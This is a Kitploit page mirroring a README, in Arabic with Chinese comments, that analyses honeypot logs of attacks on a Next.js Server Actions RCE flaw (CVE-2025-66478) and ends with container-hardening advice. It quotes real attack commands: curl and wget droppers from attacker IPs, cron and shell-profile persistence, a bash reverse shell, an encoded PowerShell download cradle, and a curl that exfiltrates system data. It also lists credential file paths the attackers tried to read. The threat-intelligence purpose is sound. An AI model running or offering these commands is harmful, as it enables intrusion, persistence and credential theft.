Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-66478 — تحليل سجلات هجمات حقيقية لـ CVE-2025-66478 (تنفيذ الأكواد عن بُعد في Server Actions الخاص بـ Next.js) مع عينات برمجيات خبيثة، وتتبع عنوان IP للمهاجم، ودروس في تعزيز أمان الحاويات. | Kitploit
أدوات/GitHubGitHub/exptechtw/cve-2025-66478
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتحقيق الجنائي الرقميتحليل البرمجيات الخبيثةاستخبارات التهديداتالتعلم والتعليمالاستجابة للحوادث
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

تحليل سجلات هجمات حقيقية لـ CVE-2025-66478 (تنفيذ الأكواد عن بُعد في Server Actions الخاص بـ Next.js) مع عينات برمجيات خبيثة، وتتبع عنوان IP للمهاجم، ودروس في تعزيز أمان الحاويات.

25منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2025-66478 - تحليل سجلات الهجمات الفعلية لثغرة RCE في Next.js Server Actions

نظرة عامة

يجمع هذا المشروع سجلات هجمات حقيقية تم تسجيلها من تطبيق Next.js 15.1.2 معرّض للإنترنت (يعمل داخل حاوية Docker). تُظهر هذه السجلات كيف يتم فحص ثغرة CVE-2025-66478 واستغلالها على نطاق واسع بواسطة أدوات هجوم آلية في البرية.

النطاق الزمني المسجَّل: 2025-12-04 ~ 2025-12-06 (حوالي 48 ساعة)

معلومات البيئة:

  • الإطار: Next.js 15.1.2
  • بيئة التشغيل: Bun v1.2.20
  • الحاوية: Docker (Alpine Linux)
  • المنطقة الزمنية: Asia/Taipei

إحصائيات أنواع الهجمات

1. تنزيل البرمجيات الخبيثة وتنفيذها (Dropper/Downloader)

يحاول المهاجمون استغلال الثغرة لتنفيذ أوامر تقوم بتنزيل البرمجيات الخبيثة وتشغيلها.

عنوان IP للهجومرابط الحمولة الخبيثةالوصف
216.158.232.43http://216.158.232.43:12000/sex.shشبكة بوتنت/برنامج تعدين
38.207.161.212http://38.207.161.212/agentبرنامج وكيل خبيث (Agent)
43.156.63.124http://43.156.63.124/tsdزرع باب خلفي عبر cron
154.38.121.219res.qiqigece.top/nginx3برنامج خبيث متنكر بهيئة nginx
47.79.42.91iot.632313373.xyz/nz.shسكربت بوتنت لإنترنت الأشياء
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shبرنامج تعدين/باب خلفي
103.135.101.15http://103.135.101.15/wocaosinm.shسكربت خبيث
38.12.24.231http://38.12.24.231/kworkerبرنامج خبيث متنكر بهيئة عامل النواة (kernel worker)
128.199.194.97http://128.199.194.97:9001/setup2.shسكربت تهيئة

أمثلة على أوامر الهجوم

root@kitploit:~
# 典型的 dropper 攻擊
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# 植入 cron 持久化後門
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# 複雜的持久化攻擊(嘗試多種下載方式 + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. الصدفة العكسية (Reverse Shell)

يحاول المهاجمون إنشاء اتصال صدفة عكسية للحصول على وصول تفاعلي.

root@kitploit:~
# Bash 反向 shell
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. هجوم PowerShell (تقدير خاطئ باستهداف Windows)

يفترض المهاجمون أن الهدف هو نظام Windows، ويحاولون تنفيذ أوامر PowerShell.

root@kitploit:~
# Base64 編碼的惡意 PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# 解碼後:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# 數學計算用於漏洞確認
powershell -c "41*271"      # = 11111(特徵碼確認)
powershell -c "44225*41002" # = 1814113450

4. جمع المعلومات (Information Gathering)

يحاول المهاجمون جمع معلومات النظام لاستخدامها في هجمات لاحقة.

root@kitploit:~
# 系統資訊收集並外傳
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. سرقة بيانات الاعتماد (Credential Harvesting)

يحاول المهاجمون قراءة ملفات وبيانات اعتماد حساسة متنوعة.

المسارات الحساسة التي تمت محاولة قراءتها

6. تسريب متغيرات البيئة

متغيرات بيئة الحاوية التي تم تسريبها بنجاح من خلال الثغرة:

root@kitploit:~
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. التسريب عبر DNS (DNS Exfiltration)

يستخدم المهاجمون استعلامات DNS لتسريب البيانات أو تأكيد وجود الثغرة:

root@kitploit:~
ping 5a58e4a0.log.dnslog.pp.ua.

أسباب فشل الهجمات

يعود سبب فشل معظم الهجمات إلى الطبيعة المُصغّرة لحاوية Alpine Linux:

الأداة المفقودةالتأثير
curlتعذّر تنزيل الحمولة الخبيثة
bashتعذّر تنفيذ الصياغات الخاصة بـ bash (مثل الصدفة العكسية)

على الرغم من أن wget متاح، إلا أن بعض السكربتات الخبيثة لا تزال تعتمد داخليًا على curl أو bash، مما يؤدي إلى فشل التنفيذ.


أمثلة على فك ترميز Base64

تحتوي السجلات على كميات كبيرة من البيانات المشفرة بـ Base64، وفيما يلي بعض نتائج فك الترميز:

تسريب معلومات النظام

root@kitploit:~
# digest: 'cm9vdAo='
解碼: root

# digest: 'dGVzdAo='
解碼: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
解碼: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
解碼: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

تسريب قائمة الدليل

root@kitploit:~
# /tmp 目錄內容
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

解碼:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

إحصائيات عناوين IP المصدرة للهجوم

فيما يلي عناوين IP المصدرة للهجوم التي تم تسجيلها:


أساليب استغلال الثغرة (Attack Vectors)

استدعاء Server Action

يحاول المهاجمون استدعاء Server Action غير موجود:

root@kitploit:~
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"

تسريب المعلومات عبر رسائل الخطأ

يستغل المهاجمون حقل digest في رسائل الخطأ لتسريب البيانات:

root@kitploit:~
Error: x
  digest: 'cm9vdAo='  // Base64 編碼的 'root'

النقاط التعليمية

1. أفضل الممارسات لأمان الحاويات

  • تصغير حجم الصورة: استخدام صورة أساسية مُصغّرة (مثل Alpine) يقلل من سطح الهجوم
  • إزالة الأدوات غير الضرورية: عدم تثبيت أدوات قد يساء استغلالها مثل curl وbash وpython
  • نظام ملفات للقراءة فقط: تشغيل الحاوية باستخدام --read-only
  • مستخدم غير root: تشغيل التطبيق بمستخدم غير مميز (غير privileged)

2. معالجة الثغرة

  • ترقية Next.js إلى نسخة مصححة
  • التحقق من مدخلات Server Action
  • تطبيق قواعد WAF لتصفية الطلبات المشبوهة

3. المراقبة والكشف

  • مراقبة تنفيذ العمليات الفرعية غير الطبيعية
  • مراقبة طلبات الاتصال الصادرة عبر الشبكة
  • مراقبة محاولات الوصول إلى الملفات الحساسة

إخلاء المسؤولية

هذا المشروع مخصص لأغراض التعليم والبحث في مجال الأمن السيبراني فقط. جميع الهجمات المسجلة هي محاولات هجوم حقيقية استهدفت بيئة هونيبوت (Honeypot) بحثية. يرجى عدم استخدام هذه المعلومات لأي أغراض غير قانونية.


عينات البرمجيات الخبيثة

يحتوي هذا المشروع على عينات برمجيات خبيثة حقيقية تم استخراجها وتنزيلها من سجلات الهجمات. للتحليل التفصيلي، يرجى الاطلاع على:

malware_samples/ANALYSIS.md

العينات التي تم الحصول عليها

ملخص أساليب الهجوم

  1. nz.sh - تثبيت وكيل مراقبة Nezha (哪吒) لمراقبة المضيف الضحية عن بُعد
  2. tsd.sh + tsd - إنشاء آليات استمرارية متعددة (cron + systemd + rc.local)
  3. init.sh + agent - إطار عمل باب خلفي متكامل يدعم أنظمة متعددة وإعادة تشغيل تلقائية وتسجيل السجلات

موارد ذات صلة

  • Next.js Security Advisories
  • OWASP - Command Injection
  • MITRE ATT&CK - Execution

الترخيص

MIT License

تنزيل الأداة
الفئةالمسار
بيانات اعتماد سحابية/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
مفاتيح SSH/root/.ssh/id_rsa, /root/.ssh/config
بيانات اعتماد Git/root/.git-credentials, /root/.gitconfig
حاويات/Kubernetes/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
التطبيقات/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
سجل الأوامر (Shell)/root/.bash_history, /root/.zsh_history
أدوات سحابية/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
إعدادات النظام/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow
powershellهجمات Windows غير فعّالة
pythonتعذّر استخدام أداة التنزيل Python
عنوان IPالدولة/المنطقة (تقديري)نوع الهجوم
216.158.232.43الولايات المتحدةDropper
38.165.44.205الولايات المتحدةDropper
23.95.44.80الولايات المتحدةDropper
154.38.121.219هونغ كونغبرمجية خبيثة (nginx3)
38.207.161.212الولايات المتحدةوكيل (Agent)
43.156.63.124الصينباب خلفي عبر cron
47.79.42.91الصين (Alibaba Cloud)بوتنت لإنترنت الأشياء
47.79.65.237الصين (Alibaba Cloud)برنامج تعدين
119.45.243.154الصين (Tencent Cloud)برنامج تعدين
144.22.210.54البرازيلDropper
217.60.249.228السويدDropper
154.26.192.32الولايات المتحدةصدفة عكسية
156.234.209.103غير معروفحمولة PowerShell
38.60.212.106الولايات المتحدةجمع المعلومات
103.135.101.15فيتنامبوتنت
128.199.194.97سنغافورة (DigitalOcean)سكربت إعداد (Setup)
38.12.24.231الولايات المتحدةبرنامج خبيث للثبات (استمرارية)
الملفالنوعالحجمالمصدرمستوى التهديد
nz.shShell Script931 Biot.632313373.xyzمتوسط
tsd.shShell Script1.7 KB43.156.63.124مرتفع
tsdELF 64-bit6.8 MB43.156.63.124مرتفع
init.shShell Script6.1 KBAWS S3حرج
agentELF 64-bit23.7 MBAWS S3حرج
Agtisx.exePE32+ (Windows)24.0 MBAWS S3حرج